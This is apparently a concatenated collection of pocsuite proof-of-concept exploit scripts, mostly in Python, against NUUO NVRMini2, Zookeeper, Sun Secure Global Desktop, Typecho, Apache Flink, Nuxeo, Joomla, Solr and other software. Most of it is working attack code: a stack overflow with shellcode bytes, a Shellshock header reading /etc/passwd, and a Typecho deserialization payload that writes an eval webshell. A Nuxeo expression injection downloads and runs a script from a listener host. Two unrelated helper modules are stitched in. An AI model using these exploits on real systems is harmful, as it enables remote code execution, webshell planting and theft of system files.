#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import Output, POCBase
from pocsuite.utils import register
import socket

def stack_buffer_overflow(command, ip, port):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    #print '[+] Executing %s on %s:%s...' % (command, ip, port)
    sock.connect((ip, int(port)))
    exec_request = ('GET /cgi-bin/cgi_system?cmd=portCheck HTTP/1.1\r\n' +
                    'Host: ' + ip + ':' + port + '\r\n' +
                    'Accept: */*\r\n' +
                    'Cookie: PHPSESSID=982e6c010064b3878a4b793bfab8d2d2' +
                    'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAABBBBCCCCDD' +
                    '\x34\x2e\x5e\x40\xaa\xaa\xaa\xaa\xbb\xbb\xbb\xbb\xcc\xcc\xcc\xcc\xfc\xbf\x54\x40\xee\xee\xee\xee\xcc\x37\x60\x40' + command +
                    '\r\n\r\n')
    sock.sendall(exec_request)
    data = sock.recv(1024)
    sock.close()
    
    # We should get a 500 Internal error in response
    return data.find('200') != -1

##
# Quickly tries to grab the version of the target. If the target is
# using anything other than 3.7 or 3.8 then we'll bail out since
# haven't tested on any other targets
##
def check_target(ip, port):
    index = req.get('http://' + ip + ':' + port + "/upgrade_handle.php?cmd=getcurrentinfo")
    return (index.text.find('<Titan>03.08') != -1 or index.text.find('<Titan>03.07') != -1)

def find_ip_port(url):
    ip = url[url.find('//')+2:url.find(':',url.find('//')+2)]
    port = url[url.find(':',5)+1:]
    return ip,port


class TestPOC(POCBase):
    vulID = '97538'  # vul ID
    version = '1'
    author = ['']
    vulDate = '2018-09-28'
    createDate = '2018-09-28'
    updateDate = '2018-09-28'
    references = ['https://www.seebug.org/vuldb/ssvid-97538']
    name = 'NUUO NVRMini2 Unauthenticated Remote Stack Buffer Overflow RCE'
    appPowerLink = 'https://www.nuuo.com/'
    appName = 'NUUO'
    appVersion = 'NVRMini2'
    vulType = 'Command Execution'
    desc = '''
         The HTTP interface exposes the binary cgi_system through the http://<target>/cgi-bin/cgi_system endpoint. Much of the functionality of cgi_system requires the remote user to be authenticated. One of the ways the system verifies authentication is by comparing the session identifier in the user's PHPSESSID cookie against the session file stored in /tmp/.
    '''

    samples = ['']
    def _attack(self):
        result={}

        ip,port = find_ip_port(self.url)

        if (check_target(ip, port) == False):
            result['result']={}
            result['result']['result'] = 'The target is not a NVRMini2 or its using an untested version.'
            return self.parse_attack(result)
        if (stack_buffer_overflow('whoami', ip, port) == False):
            result['result']={}
            result['result']['result'] = 'Exploit failed.'
            return self.parse_attack(result)
        else:
            result['result']={}
            result['result']['result'] = 'Exploit Success.'
            return self.parse_attack(result)

    def _verify(self):
        return self._attack()
        
    def parse_attack(self, result):
        output = Output(self)
        if result['result']['result'] == 'Exploit Success.':
            output.success(result)
        else:
            reason = result['result']['result']
            print("\033[0;31m%s\033[0m" % reason)
            output.fail('Exploit failed')
        return output

register(TestPOC)



#!/usr/bin/python
# -*- coding: utf-8 -*-
from pocsuite3.api import register_poc
from pocsuite3.api import Output
from pocsuite3.api import POCBase
from pocsuite3.api import logger
from urllib.parse import urlparse
import socket
from collections import OrderedDict
from pocsuite3.api import OptString

class Zookeeper(POCBase):
    vulID = ''
    version = '1.0'
    author = ['big04dream']
    vulDate = '2019-11-05'
    createDate = '2019-11-05'
    updateDate = '2019-11-05'
    references = ['']
    name = 'Zookeeper Unauthorized access'
    appPowerLink = 'https://zookeeper.apache.org/'
    appName = 'Zookeeper'
    appVersion = 'all'
    vulType = 'Unauthorized access'
    desc = '''
    Zookeeper Unauthorized access
    '''

    def _options(self):
        o = OrderedDict()
        o['port'] = OptString('', description='这个poc需要输入端口', require=False)
        return o

    def _verify(self):
        result = {}
        try:
            socket.setdefaulttimeout(10)
            host = urlparse(self.url).hostname
            port = self.get_option('port')
            if port:
                port = int(port)
            else:
                port = 2181
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((host, port))
            payload = b'envi'
            s.send(payload)
            data = s.recv(1024)
            s.close()
            if b'Environment' in data:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = host
                result['VerifyInfo']['Payload'] = payload
        except Exception as e:
            logger.info(e)
        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output

register_poc(Zookeeper)


#!/usr/bin/env python
# coding: utf-8
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class TestPOC(POCBase):
    vulID = ''  # ssvid
    version = '1.0'
    author = ['s0m30ne']
    vulDate = '2016-06-04'
    createDate = '2016-06-08'
    updateDate = '2016-06-08'
    references = ['http://www.seebug.org/vuldb/ssvid-']
    name = 'Sun Secure Global Desktop命令执行'
    appPowerLink = ''
    appName = 'Sun Secure Global Desktop'
    appVersion = ''
    vulType = '命令执行'
    desc = '''
    访问Sun Secure Global Desktop时，User-Agent处存在命令注入，可造成命令执行
    '''
    samples = ['']
    install_requires = ['']
    #请尽量不要使用第三方库，必要时参考 https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md#poc-第三方模块依赖说明 填写该字段

    def _attack(self):
        
        return self._verify()

    def _verify(self):
        result = {}
        header = {
            'User-Agent': '() { :; }; echo; /bin/cat /etc/passwd'
        }
        res = req.get("%s/tarantella/cgi-bin/modules.cgi" % self.url, headers = header)
        if 'root:x:0:0:root:' in res.text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['Url'] = self.url
            result['VerifyInfo']['PostData'] = '() { :; }; echo; /bin/cat /etc/passwd'

        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output

register(TestPOC)


#!/usr/bin/env python
# coding: utf-8

import re
from pocsuite.net import req
from pocsuite.poc import Output, POCBase
from pocsuite.utils import register

class Insky_CMS_Remote_File_Include(POCBase):
    vulID = '68005'
    version = '1'
    vulDate = '2006-06-25'
    author = ' '
    createDate = '2015-12-20'
    updateDate = ' '
    references = ['http://www.sebug.net/vuldb/ssvid-68005']
    name = 'Insky CMS 006-0111 - Multiple Remote File Include Vulnerability'
    appPowerLink = ''
    appName = 'Insky CMS'
    appVersion = '006-0111'
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']


    def _attack(self):
        return self._verify()


    def _verify(self):
        result = {}
        vul_url = '%s/modules/city.get/city.get.php?ROOT=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
        response = req.get(vul_url).content

        if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url

        return self.parse_attack(result)


    def parse_attack(self, result):
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail('failed')

        return output

register(Insky_CMS_Remote_File_Include)


#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re

class TestPOC(POCBase):
    vulID = '18676'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2009-12-24'
    createDate = '2016-01-21'
    updateDate = '2016-01-21'
    references = ['http://www.sebug.net/vuldb/ssvid-18676']
    name = 'Joomla Component com_carman Cross Site Scripting Vulnerability'
    appPowerLink = 'http://www.joomla.org'
    appName = 'Joomla!'
    appVersion = 'N/A'
    vulType = 'XSS'
    desc = '''
        Joomla组件com_carman由于参数msg过滤不严格，导致出现反射性XSS漏洞。
        
        该漏洞利用的POC格式如下：
        http://XXX/index.php?option=com_carman&msg="><script>alert(document.cookie)</script>

        该漏洞在Firefox浏览器下利用与验证的效果截图如下所示：
        （1）http://pan.baidu.com/s/1c0OnfWk
        （2）http://pan.baidu.com/s/1skl3ifb
    '''
    samples = ['http://carrentalsltd.com']

    def _attack(self):
        return self._verify()

    def _verify(self):
        #验证漏洞
        result = {}
        #特征字符串
        strxss="<0x!Q_az*^~>"
        #构造XSS验证的payload
        payload='"><script>alert(/'+strxss+'/)</script>'
        #漏洞访问地址
        exploit='/index.php?option=com_carman&msg='
        #自定义的HTTP头
        httphead = {
          'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
          'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
          'Connection':'keep-alive',
          "Content-Type": "application/x-www-form-urlencoded"
        }
        #构造访问地址
        vulurl=self.url+exploit+payload
        #访问
        resp=req.get(url=vulurl,headers=httphead,timeout=50)
        #判断返回结果
        if resp.status_code==200 and '<script>alert(/'+strxss+'/)</script>' in resp.content:
            #漏洞验证成功
            result['VerifyInfo']={}
            result['VerifyInfo']['URL'] =self.url+exploit
            result['VerifyInfo']['Payload'] = payload
        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)


#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""
#命令行
#requests 
from pocsuite.api.request import req
#register
from pocsuite.api.poc import register
#report
from pocsuite.api.poc import Output, POCBase
#url转换host
from pocsuite.lib.utils.funs import url2ip

#基础基类
class DNSPOC(POCBase):
    vulID = '44'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1' #默认为1
    vulDate = '2018-08-03' #漏洞公开的时间,不知道就写今天

    author = 'colorway' #  PoC作者的大名
    createDate = '2018-08-03'# 编写 PoC 的日期
    updateDate = '2018-08-03'# PoC 更新的时间,默认和编写时间一样
    references=""
    name = 'Domain transfer '# PoC 名称
    appPowerLink = ''# 漏洞厂商主页地址
    appName = 'DNS'# 漏洞应用名称
    appVersion = 'all versions'# 漏洞影响版本
    vulType = 'info-disclosure'#漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        DNS 域传送漏洞
    ''' # 漏洞简要描述
    samples = []# 测试样列,就是用 PoC 测试成功的网站
    install_requires = [] # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"高危" #严重,高危,中危,低危

    #指纹方法
    def _fingerprint(self):
        pass
    
    def _verify(self):
        import os, re
        result={}
        vul_url = '%s' % self.url
        block_str = ['#', '&', ';', '`', '|', '*', '~', '<', '>', '^', '(', ')', '[', ']', '{', '}', '$', '\\', '\'', '\"', '%']
        for str in block_str:
            vul_url = vul_url.replace(str, "")
        try:
            # cmd_res = os.popen('nslookup -type=ns ' + vul_url).read()  # fetch DNS Server List
            # print cmd_res
            # dns_servers = re.findall('nameserver = ([\w\.]+)', cmd_res)
            # print dns_servers
            # if len(dns_servers) == 0:
            #     print '[+] No DNS Server Found!'
            # else:
            #     for singledns in dns_servers:
            #         print '[+] Using @%s' % singledns
            #         cmd_res = os.popen('dig @%s axfr %s' % (singledns, vul_url)).read()
            #         print cmd_res
            #         if cmd_res.find('XFR size') > 0:
            #             print '[+] Vulnerable dns server found:', singledns
            #             print cmd_res
            #             result['VerifyInfo'] = {}
            #             result['VerifyInfo']['URL'] = vul_url
            #             result['VerifyInfo']['Payload'] = vul_url
            #         else:
            #             print '[+] No Vulnerable found'
            cmd_res = os.popen('dig axfr %s' % vul_url).read()
            if cmd_res.find('XFR size') > 0:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_url
                result['VerifyInfo']['Payload'] = vul_url
            else:
                print('[+] No Vulnerable found')
        except Exception as e:
            print(str(e))
            pass
        print('[+]44 poc done')
        return self.save_output(result)

    #攻击模块
    def _attack(self):
        result = {}
        return self._verify()


    #输出报告
    def save_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output


#注册类
register(DNSPOC)




#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

from pocsuite.api.request import req 
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class SolrPOC(POCBase):
    vulID = '7'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1' #默认为1
    vulDate = '2017-03-22' #漏洞公开的时间,不知道就写今天

    author = 'ly55521' #  PoC作者的大名
    createDate = '2017-03-22'# 编写 PoC 的日期
    updateDate = '2017-03-22'# PoC 更新的时间,默认和编写时间一样
    references = 'http://wy.hxsec.com/search?keywords=solr&content_search_by=by_bugs'# 漏洞地址来源,0day不用写
    name = 'Solr Unauthorized access'# PoC 名称
    appPowerLink = 'http://lucene.apache.org/solr/'# 漏洞厂商主页地址
    appName = 'Solr'# 漏洞应用名称
    appVersion = 'all versions'# 漏洞影响版本
    vulType = 'weak-pass'#漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        Solr 未授权漏洞
    ''' # 漏洞简要描述
    samples = ['http://211.117.60.54:8983/']# 测试样列,就是用 PoC 测试成功的网站
    install_requires = [] # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"中危" #严重,高危,中危,低危

    #验证漏洞 pocsuite -r 7-solr-access.py -u 1.1.1.1 --verify
    def _verify(self):
        #定义返回结果
        result = {}
        #获取漏洞url
        import urlparse, re
        Payload = "/solr/#/"
        host = urlparse.urlparse(self.url).scheme + "://" + urlparse.urlparse(self.url).netloc
        vul_url = str( host + Payload)
        #print vul_url
        r = req.get(url=vul_url,allow_redirects=False) #禁止重定向
        """
        临时判断 , 有正确和误报时,对比提取特征解决误报
        """
        #print r,type(r)
        title =re.findall(r"<title>(.*)</title>",r.content)[0]
        if  'Solr Admin' in title and 'Dashboard' in r.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vul_url
            result['VerifyInfo']['Payload'] = Payload
        else:
            result = {}
        print('[+]7 poc done')
        return self.save_output(result)

    #漏洞攻击
    def _attack(self):
        result = {}
        # 攻击代码
        return self._verify()

    def save_output(self, result):
        #判断有无结果并输出
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

register(SolrPOC)




#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

from pocsuite.api.request import req 
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class TypechoPOC(POCBase):
    vulID = '16'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1' #默认为1
    vulDate = '2017-11-14' #漏洞公开的时间,不知道就写今天

    author = 'js2012' #  PoC作者的大名
    createDate = '2017-11-14'# 编写 PoC 的日期
    updateDate = '2017-11-14'# PoC 更新的时间,默认和编写时间一样
    references = 'http://www.freebuf.com/vuls/152058.html','https://www.t00ls.net/thread-42634-1-1.html','http://p0sec.net/index.php/archives/114/'# 漏洞地址来源,0day不用写
    name = 'Typecho install.php Unserialize'# PoC 名称
    appPowerLink = 'http://typecho.org/'# 漏洞厂商主页地址
    appName = 'typecho'# 漏洞应用名称
    appVersion = 'Typecho 1.1'# 漏洞影响版本
    vulType = 'cmd-exec'#漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        Typecho install.php反序列化漏洞
    ''' # 漏洞简要描述
    samples = ['https://github.com/typecho/typecho/releases/tag/v1.1-15.5.12-beta',]# 测试样列,就是用 PoC 测试成功的网站
    install_requires = [] # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"严重" #严重,高危,中危,低危

    #验证漏洞 pocsuite -r 16-Typecho install.php-unserialize.py -u 127.0.0.5 --verify
    def _verify(self):
        result ={}
        payload =  "YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUwODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30="
        vul_url = self.url+"/install.php?finish=a"
        header = {
                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0",
                "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
                "Content-Type": "application/x-www-form-urlencoded",
                "Content-Length": 773,
                "Referer": self.url,
                "Connection": "close",
                "Upgrade-Insecure-Requests": 1
        }
        data = {
             "__typecho_config":payload
        }
        res = req.post(vul_url,headers=header,data=data)
        if "phpinfo()" in res.content:
            result['ShellInfo'] = {}
            result['ShellInfo']['URL'] = vul_url
            result['ShellInfo']['payload'] = payload
        print('[+]16 poc done')
        return self.save_output(result)
    #漏洞攻击 pocsuite -r 15-tomcat-CVE201712617.py -u 1.1.1.1 --attack
    def _attack(self):
        #定义返回结果
        result = {}
        header = {
                "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                "Accept-Encoding": "gzip, deflate",
                "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0",
                "Referer": self.url
        }
        payload = "YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6NDp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMjoiAFR5cGVjaG9fRmVlZABfY2hhcnNldCI7czo1OiJVVEYtOCI7czoxOToiAFR5cGVjaG9fRmVlZABfbGFuZyI7czoyOiJ6aCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6MTp7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NjM6ImZpbGVfcHV0X2NvbnRlbnRzKCd3ZWJzaGVsbC5waHAnLCAnPD9waHAgQGV2YWwoJF9QT1NUW3AwXSk7Pz4nKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6NzoidHlwZWNobyI7fQ=="
        data = {
            "__typecho_config":payload
        }
        #获取漏洞url
        vul_url = '%s' % self.url
        #获取处理后的url
        vul_url = self.url+"/install.php?finish=a"
        res = req.post(vul_url,headers=header,data=data)
        status = req.get(self.url+"/webshell.php").status_code
        if status == 200:
            result['VerifyInfo']={}
            result['VerifyInfo']['URL']=self.url+"/webshell.php"+"--->Password:P0"
            result['VerifyInfo']['Payload']=data
            return self.save_output(result)
    def save_output(self, result):
        #判断有无结果并输出
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

register(TypechoPOC)




#!/usr/bin/env python
#_*_ encoding: utf-8 _*_
from pocsuite3.api import register_poc
from pocsuite3.api import requests
from pocsuite3.api import Output
from pocsuite3.api import logger
from pocsuite3.api import POCBase
from pocsuite3.api import OptString
from collections import OrderedDict

class Flink(POCBase):
    vulID = 'N/A'
    version = '1.0'
    author = 'big04dream'
    vulDate = ''
    createDate = '2019-11-15'
    updateDate = '2019-11-15'
    references = ['']
    name = 'Apache Flink Any Jar Upload Results in Remote Code Execution'
    appPowerLink = ''
    appName = 'Flink'
    appVersion = '<= 1.9.1'
    vulType = 'rce'
    desc = ''' 
    Apache Flink Any Jar Upload Results in Remote Code Execution
    '''

    def _options(self):
        o = OrderedDict()
        o['jp'] = OptString('', description='exp模式需要指定jar包路径', require=False)
        return o

    def _verify(self):
        result = {}
        try:
            if self.url[-1] == '/':
                url = self.url + 'jar/upload'
            else:
                url = self.url + '/jar/upload'
            res = requests.get(url=url, timeout=2)
            flag = 'Unable to load requested file'
            if flag in res.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Stdout'] = 'The vulnerability exist'
        except Exception as e:
            logger.info(e)
        return self.parse_output(result)

    def _attack(self):
        result = {}
        try:
            webshell = self.get_option('jp')
            if self.url[-1] == '/':
                url = self.url + 'jars/upload'
            else:
                url = self.url + '/jars/upload'
            f = {'file': open(webshell, 'rb')}
            res = requests.post(url=url, files=f)
            if res.status_code == 200 and 'filename' in res.content:
                result['ShellInfo'] = {}
                result['ShellInfo']['URL'] = url
                result['ShellInfo']['Content'] = webshell
        except Exception as e:
            logger.info(e)
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Not vulnerability')
        return output

register_poc(Flink)


#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import threading
import time


def exception_handled_function(thread_function, args=()):
    try:
        thread_function(*args)
    except KeyboardInterrupt:
        raise
    except Exception as ex:
        print("thread {0}: {1}".format(threading.currentThread().getName(), str(ex)))


def run_threads(num_threads, thread_function, args: tuple = ()):
    threads = []

    # Start the threads
    for num_threads in range(num_threads):
        thread = threading.Thread(target=exception_handled_function, name=str(num_threads),
                                  args=(thread_function, args))
        thread.setDaemon(True)
        try:
            thread.start()
        except Exception as ex:
            err_msg = "error occurred while starting new thread ('{0}')".format(str(ex))
            print(err_msg)
            break

        threads.append(thread)

    # And wait for them to all finish
    alive = True
    while alive:
        alive = False
        for thread in threads:
            if thread.isAlive():
                alive = True
                time.sleep(0.1)



#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import os
import queue

PATHS_ROOT = os.path.realpath(os.path.join(os.path.dirname(os.path.realpath(__file__)), "../"))
PATHS_POCS = os.path.join(PATHS_ROOT, "easy_pocs")
PATHS_OUTPUT = os.path.join(PATHS_ROOT, "output")
VERSION = "v0.1"

POCS = []
WORKER = queue.Queue()
CONF = {}

RESULTS=[]



#!/usr/bin/env python3

from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import POC_CATEGORY, OptDict, OptString, OptIP, OptPort, VUL_TYPE
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD
from pocsuite3.lib.utils import random_str
from urllib.parse import urljoin
from requests.exceptions import ReadTimeout
from collections import OrderedDict

from pocsuite3.lib.core.common import get_host_ip, get_host_ipv6
from pocsuite3.lib.core.data import logger
from pocsuite3.modules.httpserver import PHTTPServer, BaseRequestHandler

class DemoPOC(POCBase):
    vulID = ''
    version = ''
    author = 'm01e'  # PoC作者的大名
    vulDate = '2018-08-08'  # 漏洞公开的时间,不知道就写今天
    createDate = '20200731'  # 编写 PoC 的日期
    updateDate = ''  # PoC 更新的时间,默认和编写时间一样
    references = [
        'https://medium.com/@m01e/nuxeo-unauthenticated-rce-analysis-2f88d412e176',
        'http://blog.orange.tw/2018/08/how-i-chained-4-bugs-features-into-rce-on-amazon.html',
        'http://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf']  # 漏洞地址来源,0day不用写
    name = 'Nuxeo Unauthenticated RCE'  # PoC 名称
    appPowerLink = 'https://www.nuxeo.com/'  # 漏洞厂商主页地址
    appName = 'Nuxeo'  # 漏洞应用名称
    appVersion = '<= 8.10'  # 漏洞影响版本
    vulType = 'Remote Code Execution'  # 漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
    Nuxeo unauthenticated remote code execution vulnerability. 
        '''  # 漏洞简要描述
    samples = []  # 测试样列,就是用 PoC 测试成功的网站
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    pocDesc = ''' 
    1. before use <check>/<attack>
    step1: set target <http://<YOUR-HOST:PORT>/>
    step2: set http_server_ip <YOUR-HTTP-SERVER-IP>
    step3: set http_server_port <YOUR-HTTP-SERVER-PORT>
    step4: start your http server 
    step5: check
    
    2. before use <shell>
    step1-4: the same as <check>/<attack>
    step5: set lhost <YOUR-HOST>
    step6: set lport <YOUR-PORT>
    step7: exploit
    '''

    # def start_ipv4_httpserver(self, ip, port):
    #     try:
    #         PHTTPServer._instance = None
    #         self.httpd = PHTTPServer(bind_ip=ip, bind_port=port, requestHandler=MyRequestHandler)
    #         self.httpd.start()
    #     except Exception as e:
    #         logger.info('start http server failed!', e)
    #
    # def stop_ipv4_httpserver(self):
    #     self.httpd.stop()

    def _options(self):
        o = OrderedDict()
        o["http_server_ip"] = OptIP('192.168.3.1', description='HTTP服务IP', require=True)
        o["http_server_port"] = OptPort(8384, description='HTTP服务端口', require=True)
        return o

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _verify(self):
        proxies = {
            'http': 'http://127.0.0.1:8080',
            'https': 'http://127.0.0.1:8080'
        }
        result = {}
        httpServerIp = self.get_option('http_server_ip')
        httpServerPort = self.get_option('http_server_port')
        # 因为使用了format对字符串格式化, 故需要在原来的payload里多加一层{},否则会报错
        payload_part1 = "/?key=#{{request.setAttribute('methods',''['class'].forName('java.lang.Runtime').getDeclaredMethods())" \
                        "---request.getAttribute('methods')[15].invoke(request.getAttribute('methods')[7].invoke(null), " \
                        "'wget {0}:{1}/note.py')}}".format(httpServerIp, httpServerPort)
        url = urljoin(self.url, "/nuxeo/create_file.xhtml")
        params = {
            'actionMethod': "widgets/suggest_add_new_directory_entry_iframe.xhtml:request.getParameter('directoryNameForPopup')",
            'directoryNameForPopup': payload_part1
        }
        try:
            rr = requests.get(url, params=params, verify=False)
            if rr.status_code == 302 or rr.status_code == 200:
                result['status'] = 'success'
        except ReadTimeout:
            pass
        except Exception as e:
            pass

        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def _shell(self):
        self._verify()

        proxies = {
            'http': 'http://127.0.0.1:8080',
            'https': 'http://127.0.0.1:8080'
        }

        payload_part2 = "/?key=#{request.setAttribute('methods',''['class'].forName('java.lang.Runtime').getDeclaredMethods())" \
                        "---request.getAttribute('methods')[15].invoke(request.getAttribute('methods')[7].invoke(null), " \
                        "'python note.py')}"

        url = urljoin(self.url, "/nuxeo/create_file.xhtml")
        params = {
            'actionMethod': "widgets/suggest_add_new_directory_entry_iframe.xhtml:request.getParameter('directoryNameForPopup')",
            'directoryNameForPopup': payload_part2
        }
        try:
            rr = requests.get(url, params=params, verify=False)
            if rr.status_code == 302 or rr.status_code == 200:
                pass
        except ReadTimeout:
            pass
        except Exception as e:
            pass

register_poc(DemoPOC)



#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import urlparse

class TestPOC(POCBase):
    vulID = '67514'  # ssvid
    version = '1.0'
    author = ['hfloveyy']
    vulDate = '2010-01-26'
    createDate = '2015-12-08'
    updateDate = '2015-12-08'
    references = ['http://www.sebug.net/vuldb/ssvid-67514']
    name = 'Max&#39;s Image Uploader Shell Upload Vulnerability'
    appPowerLink = 'http://www.phpf1.com'
    appName = 'PHP F1 Max&#39;s Image Uploader'
    appVersion = '1.0'
    vulType = 'File upload vulnerability'
    desc = '''
    PHP F1 Max's Image Uploader 1.0版本的maxImageUpload/index.php中存在无限制文件上传漏洞。
当Apache未被设置来处理具有pjpeg或jpeg扩展名的拟态文件时，远程攻击者可以通过上传具有一个pjpeg或jpeg扩展名的文件，执行任意代码，并借助对original/的一个直接请求来访问该文件。 
    '''
    samples = ['127.0.0.1']

    def _attack(self):
        result = {}
        #Write your code here

        return self.parse_output(result)

    def _verify(self):
        result = {}
        testurl = urlparse.urljoin(self.url, '/maxImageUpload/original/1.php')
        vulurl = urlparse.urljoin(self.url, '/maxImageUpload/index.php')

        payload = {'myfile':('1.php','<?php echo md5(0x2333333);unlink(__FILE__);?>','image/jpeg')}
        data = {'submitBtn':'Upload'}



        
        req.post(vulurl,files = payload,data = data).content
        resp = req.get(testurl)
        if '5a8adb32edd60e0cfb459cfb38093755' in resp:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vulurl
            result['VerifyInfo']['Payload'] = payload
        #Write your code here

        return self.parse_output(result)

    def parse_output(self, result):


        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)


